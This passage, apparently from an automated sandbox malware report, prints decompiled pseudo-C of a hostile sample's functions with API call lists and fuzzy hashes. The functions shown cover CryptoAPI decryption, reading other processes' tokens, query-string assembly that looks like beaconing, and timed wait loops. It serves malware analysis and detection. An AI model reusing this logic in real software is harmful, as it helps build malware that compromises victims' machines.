                        • StrChrA.SHLWAPI(?,0000002E), ref: 0477506F
                        • memcpy.NTDLL(04772779,?,00000000), ref: 047750A8
                        • FindNextFileA.KERNELBASE(04773EAC,?), ref: 047750BD
                        • FindClose.KERNEL32(04773EAC), ref: 047750CA
                        • FindFirstFileA.KERNEL32(?,?), ref: 047750D6
                        • CompareFileTime.KERNEL32(?,?), ref: 047750E6
                        • FindClose.KERNELBASE(04773EAC), ref: 0477511B
                        • HeapFree.KERNEL32(00000000,04772779,73797325), ref: 0477512D
                        • HeapFree.KERNEL32(00000000,?), ref: 0477513D
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                        • String ID:
                        • API String ID: 2944988578-0
                        • Opcode ID: 323ec4101b3a0a521548fa19d82157e84dde8521bd7c3bdaad39665b381a74a2
                        • Instruction ID: afb0a641749e60fd523fa2ed015194cbe54fba847cae480c28489c20843dea3c
                        • Opcode Fuzzy Hash: 323ec4101b3a0a521548fa19d82157e84dde8521bd7c3bdaad39665b381a74a2
                        • Instruction Fuzzy Hash: 03812CB1A00219AFEF11DFA5DC84EEEBBB9FB44340F504466E605E6250E775AE44CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E047735A1(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                        				int _v8;
                        				long* _v12;
                        				int _v16;
                        				BYTE* _v20;
                        				long* _v24;
                        				void* _v39;
                        				char _v40;
                        				void _v56;
                        				int _v60;
                        				intOrPtr _v64;
                        				void _v67;
                        				char _v68;
                        				void* _t61;
                        				int _t68;
                        				signed int _t76;
                        				int _t79;
                        				int _t81;
                        				int _t85;
                        				long _t86;
                        				int _t90;
                        				signed int _t94;
                        				int _t101;
                        				BYTE* _t102;
                        				int _t103;
                        				void* _t104;
                        				void* _t105;
                        				void* _t106;
                        
                        				_t103 = __eax;
                        				_t94 = 6;
                        				_v68 = 0;
                        				memset( &_v67, 0, _t94 << 2);
                        				_t105 = _t104 + 0xc;
                        				asm("stosw");
                        				asm("stosb");
                        				_v40 = 0;
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosw");
                        				asm("stosb");
                        				_t61 =  *0x477a0b8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                        				if(_t61 == 0) {
                        					_a8 = GetLastError();
                        				} else {
                        					_t101 = 0x10;
                        					memcpy( &_v56, _a8, _t101);
                        					_t106 = _t105 + 0xc;
                        					_v60 = _t101;
                        					_v67 = 2;
                        					_v64 = 0x660e;
                        					_v68 = 8;
                        					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                        					if(_t68 == 0) {
                        						_a8 = GetLastError();
                        					} else {
                        						_push(0);
                        						_push( &_v40);
                        						_push(1);
                        						_push(_v12);
                        						if( *0x477a0dc() == 0) {
                        							_a8 = GetLastError();
                        						} else {
                        							_t18 = _t103 + 0xf; // 0x10
                        							_t76 = _t18 & 0xfffffff0;
                        							if(_a4 != 0 && _t76 == _t103) {
                        								_t76 = _t76 + _t101;
                        							}
                        							_t102 = E04775C4E(_t76);
                        							_v20 = _t102;
                        							if(_t102 == 0) {
                        								_a8 = 8;
                        							} else {
                        								_v16 = 0;
                        								_a8 = 0;
                        								while(1) {
                        									_t79 = 0x10;
                        									_v8 = _t79;
                        									if(_t103 <= _t79) {
                        										_v8 = _t103;
                        									}
                        									memcpy(_t102, _a12, _v8);
                        									_t81 = _v8;
                        									_a12 = _a12 + _t81;
                        									_t103 = _t103 - _t81;
                        									_t106 = _t106 + 0xc;
                        									if(_a4 == 0) {
                        										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                        									} else {
                        										_t85 =  *0x477a0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                        									}
                        									if(_t85 == 0) {
                        										break;
                        									}
                        									_t90 = _v8;
                        									_v16 = _v16 + _t90;
                        									_t102 =  &(_t102[_t90]);
                        									if(_t103 != 0) {
                        										continue;
                        									} else {
                        										L17:
                        										 *_a16 = _v20;
                        										 *_a20 = _v16;
                        									}
                        									goto L21;
                        								}
                        								_t86 = GetLastError();
                        								_a8 = _t86;
                        								if(_t86 != 0) {
                        									E04772A03(_v20);
                        								} else {
                        									goto L17;
                        								}
                        							}
                        						}
                        						L21:
                        						CryptDestroyKey(_v12);
                        					}
                        					CryptReleaseContext(_v24, 0);
                        				}
                        				return _a8;
                        			}

                        APIs
                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,04771B16,00000001,04776301,00000000), ref: 047735D9
                        • memcpy.NTDLL(04771B16,04776301,00000010,?,?,?,04771B16,00000001,04776301,00000000,?,04775B47,00000000,04776301,?,00000000), ref: 047735F2
                        • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 0477361B
                        • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 04773633
                        • memcpy.NTDLL(00000000,00000000,050E9630,00000010), ref: 04773685
                        • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,050E9630,00000020,?,?,00000010), ref: 047736AE
                        • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,050E9630,?,?,00000010), ref: 047736C5
                        • GetLastError.KERNEL32(?,?,00000010), ref: 047736DD
                        • GetLastError.KERNEL32 ref: 0477370F
                        • CryptDestroyKey.ADVAPI32(00000000), ref: 0477371B
                        • GetLastError.KERNEL32 ref: 04773723
                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04773730
                        • GetLastError.KERNEL32(?,?,?,04771B16,00000001,04776301,00000000,?,04775B47,00000000,04776301,?,00000000,04776301,00000000,050E9630), ref: 04773738
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                        • String ID:
                        • API String ID: 1967744295-0
                        • Opcode ID: f5bc625d2797a30de6d09d3ef488859b42edd3c0b7510db0d7cc020bce98699e
                        • Instruction ID: 03140a2018a4d433834acb9c740e3b7823e449b3ef79d0d43a3026aca8aa5f28
                        • Opcode Fuzzy Hash: f5bc625d2797a30de6d09d3ef488859b42edd3c0b7510db0d7cc020bce98699e
                        • Instruction Fuzzy Hash: 475141B1900209FFEF10DFA5DD84AEE7BB9EB44340F508829F915E6250E735AE14DB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 38%
                        			E04773CA1(char _a4, void* _a8) {
                        				void* _v8;
                        				void* _v12;
                        				char _v16;
                        				void* _v20;
                        				char _v24;
                        				char _v28;
                        				char _v32;
                        				char _v36;
                        				char _v40;
                        				void* _v44;
                        				void** _t33;
                        				void* _t40;
                        				void* _t43;
                        				void** _t44;
                        				intOrPtr* _t47;
                        				char _t48;
                        
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				_v20 = _a4;
                        				_t48 = 0;
                        				_v16 = 0;
                        				_a4 = 0;
                        				_v44 = 0x18;
                        				_v40 = 0;
                        				_v32 = 0;
                        				_v36 = 0;
                        				_v28 = 0;
                        				_v24 = 0;
                        				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                        					_t33 =  &_v8;
                        					__imp__(_v12, 8, _t33);
                        					if(_t33 >= 0) {
                        						_t47 = __imp__;
                        						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                        						_t44 = E04775C4E(_a4);
                        						if(_t44 != 0) {
                        							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                        							if(_t40 >= 0) {
                        								memcpy(_a8,  *_t44, 0x1c);
                        								_t48 = 1;
                        							}
                        							E04772A03(_t44);
                        						}
                        						NtClose(_v8); // executed
                        					}
                        					NtClose(_v12);
                        				}
                        				return _t48;
                        			}

                        APIs
                        • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04773CE8
                        • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 04773CFB
                        • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 04773D17
                          • Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A
                        • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 04773D34
                        • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04773D41
                        • NtClose.NTDLL(00000000), ref: 04773D53
                        • NtClose.NTDLL(00000000), ref: 04773D5D
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                        • String ID:
                        • API String ID: 2575439697-0
                        • Opcode ID: 904728498db9bbce25a823192f6c23fb88c6ea36e3377f3109e50ede9110dec2
                        • Instruction ID: 51daa7090b6ea8365169a56ec6eb9ed48c73bfa04c3385f7ebee7006c1a8c148
                        • Opcode Fuzzy Hash: 904728498db9bbce25a823192f6c23fb88c6ea36e3377f3109e50ede9110dec2
                        • Instruction Fuzzy Hash: 2021E9B1900118BBEF119F95CC499DEBFBDFF08740F508066FA05E6260E7719A54DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E04776DB7(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
                        				void* _v8;
                        				void* _v12;
                        				void* _v16;
                        				void* _v20;
                        				void* __ebx;
                        				void* __edi;
                        				long _t63;
                        				intOrPtr _t64;
                        				intOrPtr _t65;
                        				intOrPtr _t66;
                        				intOrPtr _t67;
                        				intOrPtr _t68;
                        				void* _t71;
                        				intOrPtr _t72;
                        				int _t75;
                        				void* _t76;
                        				intOrPtr _t77;
                        				intOrPtr _t81;
                        				intOrPtr _t85;
                        				intOrPtr _t86;
                        				void* _t88;
                        				void* _t91;
                        				intOrPtr _t95;
                        				intOrPtr _t99;
                        				intOrPtr* _t101;
                        				void* _t102;
                        				void* _t107;
                        				intOrPtr _t112;
                        				signed int _t116;
                        				char** _t118;
                        				int _t121;
                        				signed int _t123;
                        				intOrPtr* _t124;
                        				intOrPtr* _t126;
                        				intOrPtr* _t128;
                        				intOrPtr* _t130;
                        				intOrPtr _t133;
                        				intOrPtr _t136;
                        				int _t139;
                        				intOrPtr _t140;
                        				int _t143;
                        				void* _t144;
                        				void* _t145;
                        				void* _t155;
                        				int _t158;
                        				void* _t159;
                        				void* _t160;
                        				void* _t161;
                        				intOrPtr _t162;
                        				void* _t164;
                        				long _t168;
                        				intOrPtr* _t169;
                        				intOrPtr* _t172;
                        				void* _t173;
                        				void* _t175;
                        				void* _t176;
                        				void* _t181;
                        
                        				_t155 = __edx;
                        				_t145 = __ecx;
                        				_t63 = __eax;
                        				_t144 = _a20;
                        				_a20 = 8;
                        				if(__eax == 0) {
                        					_t63 = GetTickCount();
                        				}
                        				_t64 =  *0x477a018; // 0x5ffc1f8b
                        				asm("bswap eax");
                        				_t65 =  *0x477a014; // 0x5cb11ae7
                        				asm("bswap eax");
                        				_t66 =  *0x477a010; // 0x15dc9586
                        				asm("bswap eax");
                        				_t67 =  *0x477a00c; // 0x67522d90
                        				asm("bswap eax");
                        				_t68 =  *0x477a2d0; // 0x96d5a8
                        				_t3 = _t68 + 0x477b622; // 0x74666f73
                        				_t158 = wsprintfA(_t144, _t3, 3, 0x3d14c, _t67, _t66, _t65, _t64,  *0x477a02c,  *0x477a004, _t63);
                        				_t71 = E0477271A();
                        				_t72 =  *0x477a2d0; // 0x96d5a8
                        				_t4 = _t72 + 0x477b662; // 0x74707526
                        				_t75 = wsprintfA(_t158 + _t144, _t4, _t71);
                        				_t175 = _t173 + 0x38;
                        				_t159 = _t158 + _t75;
                        				if(_a8 != 0) {
                        					_t140 =  *0x477a2d0; // 0x96d5a8
                        					_t8 = _t140 + 0x477b66d; // 0x732526
                        					_t143 = wsprintfA(_t159 + _t144, _t8, _a8);
                        					_t175 = _t175 + 0xc;
                        					_t159 = _t159 + _t143;
                        				}
                        				_t76 = E04772956(_t145);
                        				_t77 =  *0x477a2d0; // 0x96d5a8
                        				_t10 = _t77 + 0x477b38a; // 0x6d697426
                        				_t160 = _t159 + wsprintfA(_t159 + _t144, _t10, _t76, _t155);
                        				_t81 =  *0x477a2d0; // 0x96d5a8
                        				_t12 = _t81 + 0x477b7b4; // 0x50e8d5c
                        				_t181 = _a4 - _t12;
                        				_t14 = _t81 + 0x477b33b; // 0x74636126
                        				_t157 = 0 | _t181 == 0x00000000;
                        				_t161 = _t160 + wsprintfA(_t160 + _t144, _t14, _t181 == 0);
                        				_t85 =  *0x477a318; // 0x50e95e0
                        				_t176 = _t175 + 0x1c;
                        				if(_t85 != 0) {
                        					_t136 =  *0x477a2d0; // 0x96d5a8
                        					_t18 = _t136 + 0x477b8ea; // 0x3d736f26
                        					_t139 = wsprintfA(_t161 + _t144, _t18, _t85);
                        					_t176 = _t176 + 0xc;
                        					_t161 = _t161 + _t139;
                        				}
                        				_t86 =  *0x477a328; // 0x50e95b0
                        				if(_t86 != 0) {
                        					_t133 =  *0x477a2d0; // 0x96d5a8
                        					_t20 = _t133 + 0x477b685; // 0x73797326
                        					wsprintfA(_t161 + _t144, _t20, _t86);
                        					_t176 = _t176 + 0xc;
                        				}
                        				_t162 =  *0x477a37c; // 0x50e9630
                        				_t88 = E04775741(0x477a00a, _t162 + 4);
                        				_t168 = 0;
                        				_v12 = _t88;
                        				if(_t88 == 0) {
                        					L28:
                        					RtlFreeHeap( *0x477a290, _t168, _t144); // executed
                        					return _a20;
                        				} else {
                        					_t91 = RtlAllocateHeap( *0x477a290, 0, 0x800);
                        					_a8 = _t91;
                        					if(_t91 == 0) {
                        						L27:
                        						HeapFree( *0x477a290, _t168, _v12);
                        						goto L28;
                        					}
                        					E04771A51(GetTickCount());
                        					_t95 =  *0x477a37c; // 0x50e9630
                        					__imp__(_t95 + 0x40);
                        					asm("lock xadd [eax], ecx");
                        					_t99 =  *0x477a37c; // 0x50e9630
                        					__imp__(_t99 + 0x40);
                        					_t101 =  *0x477a37c; // 0x50e9630
                        					_t102 = E04775AE3(1, _t157, _t144,  *_t101); // executed
                        					_t164 = _t102;
                        					_v20 = _t164;
                        					asm("lock xadd [eax], ecx");
                        					if(_t164 == 0) {
                        						L26:
                        						HeapFree( *0x477a290, _t168, _a8);
                        						goto L27;
                        					}
                        					StrTrimA(_t164, 0x47792cc);
                        					_push(_t164);
                        					_t107 = E04772829();
                        					_v8 = _t107;
                        					if(_t107 == 0) {
                        						L25:
                        						HeapFree( *0x477a290, _t168, _t164);
                        						goto L26;
                        					}
                        					 *_t164 = 0;
                        					__imp__(_a8, _v12);
                        					_t169 = __imp__;
                        					 *_t169(_a8, _v8);
                        					 *_t169(_a8, _t164);
                        					_t112 = E047733FA(0, _a8);
                        					_a4 = _t112;
                        					if(_t112 == 0) {
                        						_a20 = 8;
                        						L23:
                        						E04772813();
                        						L24:
                        						HeapFree( *0x477a290, 0, _v8);
                        						_t168 = 0;
                        						goto L25;
                        					}
                        					_t116 = E04775C63(_t144, 0xffffffffffffffff, _t164,  &_v16); // executed
                        					_a20 = _t116;
                        					if(_t116 == 0) {
                        						_t172 = _v16;
                        						_t123 = E04771671(_t172, _a4, _a12, _a16); // executed
                        						_a20 = _t123;
                        						_t124 =  *((intOrPtr*)(_t172 + 8));
                        						 *((intOrPtr*)( *_t124 + 0x80))(_t124);
                        						_t126 =  *((intOrPtr*)(_t172 + 8));
                        						 *((intOrPtr*)( *_t126 + 8))(_t126);
                        						_t128 =  *((intOrPtr*)(_t172 + 4));
                        						 *((intOrPtr*)( *_t128 + 8))(_t128);
                        						_t130 =  *_t172;
                        						 *((intOrPtr*)( *_t130 + 8))(_t130);
                        						E04772A03(_t172);
                        					}
                        					if(_a20 != 0x10d2) {
                        						L18:
                        						if(_a20 == 0) {
                        							_t118 = _a12;
                        							if(_t118 != 0) {
                        								_t165 =  *_t118;
                        								_t170 =  *_a16;
                        								wcstombs( *_t118,  *_t118,  *_a16);
                        								_t121 = E04776459(_t165, _t165, _t170 >> 1);
                        								_t164 = _v20;
                        								 *_a16 = _t121;
                        							}
                        						}
                        						goto L21;
                        					} else {
                        						if(_a12 != 0) {
                        							L21:
                        							E04772A03(_a4);
                        							if(_a20 == 0 || _a20 == 0x10d2) {
                        								goto L24;
                        							} else {
                        								goto L23;
                        							}
                        						}
                        						_a20 = _a20 & 0x00000000;
                        						goto L18;
                        					}
                        				}
                        			}

                        APIs
                        • GetTickCount.KERNEL32 ref: 04776DCE
                        • wsprintfA.USER32 ref: 04776E1B
                        • wsprintfA.USER32 ref: 04776E38
                        • wsprintfA.USER32 ref: 04776E58
                        • wsprintfA.USER32 ref: 04776E76
                        • wsprintfA.USER32 ref: 04776E99
                        • wsprintfA.USER32 ref: 04776EBA
                        • wsprintfA.USER32 ref: 04776EDA
                        • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04776F0B
                        • GetTickCount.KERNEL32 ref: 04776F1C
                        • RtlEnterCriticalSection.NTDLL(050E95F0), ref: 04776F30
                        • RtlLeaveCriticalSection.NTDLL(050E95F0), ref: 04776F4E
                          • Part of subcall function 04775AE3: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,04776301,00000000,050E9630), ref: 04775B0E
                          • Part of subcall function 04775AE3: lstrlen.KERNEL32(00000000,?,00000000,04776301,00000000,050E9630), ref: 04775B16
                          • Part of subcall function 04775AE3: strcpy.NTDLL ref: 04775B2D
                          • Part of subcall function 04775AE3: lstrcat.KERNEL32(00000000,00000000), ref: 04775B38
                          • Part of subcall function 04775AE3: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,04776301,?,00000000,04776301,00000000,050E9630), ref: 04775B55
                        • StrTrimA.SHLWAPI(00000000,047792CC,?,050E9630), ref: 04776F83
                          • Part of subcall function 04772829: lstrlen.KERNEL32(050E887A,00000000,00000000,00000000,04776328,00000000), ref: 04772839
                          • Part of subcall function 04772829: lstrlen.KERNEL32(?), ref: 04772841
                          • Part of subcall function 04772829: lstrcpy.KERNEL32(00000000,050E887A), ref: 04772855
                          • Part of subcall function 04772829: lstrcat.KERNEL32(00000000,?), ref: 04772860
                        • lstrcpy.KERNEL32(00000000,?), ref: 04776FA3
                        • lstrcat.KERNEL32(00000000,?), ref: 04776FB5
                        • lstrcat.KERNEL32(00000000,00000000), ref: 04776FBB
                          • Part of subcall function 047733FA: lstrlen.KERNEL32(?,0477A380,73BB7FC0,00000000,04772788,?,?,?,?,?,04773EAC,?), ref: 04773403
                          • Part of subcall function 047733FA: mbstowcs.NTDLL ref: 0477342A
                          • Part of subcall function 047733FA: memset.NTDLL ref: 0477343C
                        • wcstombs.NTDLL ref: 0477704E
                          • Part of subcall function 04771671: SysAllocString.OLEAUT32(00000000), ref: 047716B2
                          • Part of subcall function 04771671: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 04771734
                          • Part of subcall function 04771671: StrStrIW.SHLWAPI(00000000,006E0069), ref: 04771773
                          • Part of subcall function 04772A03: RtlFreeHeap.NTDLL(00000000,00000000,04774072,00000000,?,?,00000000,?,?,?,?,?,?,047744AE,00000000), ref: 04772A0F
                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 0477708F
                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0477709F
                        • HeapFree.KERNEL32(00000000,00000000,?,050E9630), ref: 047770AF
                        • HeapFree.KERNEL32(00000000,?), ref: 047770BF
                        • RtlFreeHeap.NTDLL(00000000,?), ref: 047770CD
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                        • String ID:
                        • API String ID: 2871901346-0
                        • Opcode ID: b3a745d8dbf5bf6e3b29362836e01944274ea15405ee8ec02551055401676872
                        • Instruction ID: 031ebc822792b74ea655e3726bbb01aa515ec0ca05a10f61fc4ba8d327d00ae2
                        • Opcode Fuzzy Hash: b3a745d8dbf5bf6e3b29362836e01944274ea15405ee8ec02551055401676872
                        • Instruction Fuzzy Hash: 81A14CB1500109AFEF11DFA8DC88EDA3BA9FB48354B948825F909D7250D739ED50CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 83%
                        			E04771B47(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				struct %anon52 _v8;
                        				long _v12;
                        				char _v16;
                        				char _v20;
                        				signed int _v24;
                        				intOrPtr _v32;
                        				union _LARGE_INTEGER _v36;
                        				intOrPtr _v40;
                        				void* _v44;
                        				void _v88;
                        				char _v92;
                        				struct %anon52 _t46;
                        				intOrPtr _t51;
                        				long _t53;
                        				void* _t54;
                        				struct %anon52 _t61;
                        				long _t65;
                        				signed int _t66;
                        				void* _t69;
                        				void* _t71;
                        				signed int _t72;
                        				intOrPtr _t74;
                        				intOrPtr _t76;
                        				void** _t78;
                        				void* _t80;
                        
                        				_t74 = __edx;
                        				_v92 = 0;
                        				memset( &_v88, 0, 0x2c);
                        				_t46 = CreateWaitableTimerA(0, 1, 0);
                        				_v44 = _t46;
                        				if(_t46 == 0) {
                        					_v8.LowPart = GetLastError();
                        				} else {
                        					_push(0xffffffff);
                        					_push(0xff676980);
                        					_push(0);
                        					_push( *0x477a298);
                        					_v20 = 0;
                        					_v16 = 0;
                        					L04777F56();
                        					_v36.LowPart = _t46;
                        					_v32 = _t74;
                        					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                        					_t51 =  *0x477a2c4; // 0x2e8
                        					_v40 = _t51;
                        					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                        					_v8.LowPart = _t53;
                        					if(_t53 == 0) {
                        						if(_a8 != 0) {
                        							L4:
                        							 *0x477a2a4 = 5;
                        						} else {
                        							_t69 = E04774A3C(_t74); // executed
                        							if(_t69 != 0) {
                        								goto L4;
                        							}
                        						}
                        						_v12 = 0;
                        						L6:
                        						L6:
                        						if(_v12 == 1 && ( *0x477a2b8 & 0x00000001) == 0) {
                        							_v12 = 2;
                        						}
                        						_t72 = _v12;
                        						_t58 = _t72 << 4;
                        						_t76 = _t80 + (_t72 << 4) - 0x54;
                        						_t73 = _t72 + 1;
                        						_v24 = _t72 + 1;
                        						_t61 = E0477243C( &_v20, _t73, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
                        						_v8.LowPart = _t61;
                        						if(_t61 != 0) {
                        							goto L17;
                        						}
                        						_t66 = _v24;
                        						_t90 = _t66 - 3;
                        						_v12 = _t66;
                        						if(_t66 != 3) {
                        							goto L6;
                        						} else {
                        							_v8.LowPart = E04777289(_t73, _t90,  &_v92, _a4, _a8);
                        						}
                        						goto L12;
                        						L17:
                        						__eflags = _t61 - 0x10d2;
                        						if(_t61 != 0x10d2) {
                        							_push(0xffffffff);
                        							_push(0xff676980);
                        							_push(0);
                        							_push( *0x477a29c);
                        							goto L21;
                        						} else {
                        							__eflags =  *0x477a2a0; // 0xa
                        							if(__eflags == 0) {
                        								goto L12;
                        							} else {
                        								_t61 = E04772813();
                        								_push(0xffffffff);
                        								_push(0xdc3cba00);
                        								_push(0);
                        								_push( *0x477a2a0);
                        								L21:
                        								L04777F56();
                        								_v36.LowPart = _t61;
                        								_v32 = _t76;
                        								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                        								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                        								__eflags = _t65;
                        								_v8.LowPart = _t65;
                        								if(_t65 == 0) {
                        									goto L6;
                        								} else {
                        									goto L12;
                        								}
                        							}
                        						}
                        						L25:
                        					}
                        					L12:
                        					_t78 =  &_v92;
                        					_t71 = 3;
                        					do {
                        						_t54 =  *_t78;
                        						if(_t54 != 0) {
                        							HeapFree( *0x477a290, 0, _t54);
                        						}
                        						_t78 =  &(_t78[4]);
                        						_t71 = _t71 - 1;
                        					} while (_t71 != 0);
                        					CloseHandle(_v44);
                        				}
                        				return _v8;
                        				goto L25;
                        			}

                        APIs
                        • memset.NTDLL ref: 04771B5C
                        • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04771B68
                        • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04771B8D
                        • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04771BA9
                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04771BC2
                        • HeapFree.KERNEL32(00000000,00000000), ref: 04771C57
                        • CloseHandle.KERNEL32(?), ref: 04771C66
                        • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04771CA0
                        • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04772F7D), ref: 04771CB6
                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04771CC1
                          • Part of subcall function 04774A3C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,050E9338,00000000,?,73BCF710,00000000,73BCF730), ref: 04774A8B
                          • Part of subcall function 04774A3C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,050E9370,?,00000000,30314549,00000014,004F0053,050E932C), ref: 04774B28
                          • Part of subcall function 04774A3C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04771BD5), ref: 04774B3A
                        • GetLastError.KERNEL32 ref: 04771CD3
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                        • String ID:
                        • API String ID: 3521023985-0
                        • Opcode ID: fb2c9934f39e3bd8ebbec60ef234e45f543ca27d1123dd0e122706c95e869e07
                        • Instruction ID: 3500a22b853e4af48e057d234d737c7a0dd5b269479ea2e0c96ac3479713ea7a
                        • Opcode Fuzzy Hash: fb2c9934f39e3bd8ebbec60ef234e45f543ca27d1123dd0e122706c95e869e07
                        • Instruction Fuzzy Hash: 6D519CB0905229AEEF109FD4DD44DEEBFB8EF48360F908116E910E2390D735AA44CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 74%
                        			E047757AD(intOrPtr __edx, void** _a4, void** _a8) {
                        				intOrPtr _v8;
                        				struct _FILETIME* _v12;
                        				short _v56;
                        				struct _FILETIME* _t12;
                        				intOrPtr _t13;
                        				void* _t17;
                        				void* _t21;
                        				intOrPtr _t27;
                        				long _t28;
                        				void* _t30;
                        
                        				_t27 = __edx;
                        				_t12 =  &_v12;
                        				GetSystemTimeAsFileTime(_t12);
                        				_push(0x192);
                        				_push(0x54d38000);
                        				_push(_v8);
                        				_push(_v12);
                        				L04777F50();
                        				_push(_t12);
                        				_v12 = _t12;
                        				_t13 =  *0x477a2d0; // 0x96d5a8
                        				_t5 = _t13 + 0x477b84d; // 0x50e8df5
                        				_t6 = _t13 + 0x477b580; // 0x530025
                        				_push(0x16);
                        				_push( &_v56);
                        				_v8 = _t27;
                        				L04777C2A();
                        				_t17 = CreateFileMappingW(0xffffffff, 0x477a2d4, 4, 0, 0x1000,  &_v56); // executed
                        				_t30 = _t17;
                        				if(_t30 == 0) {
                        					_t28 = GetLastError();
                        				} else {
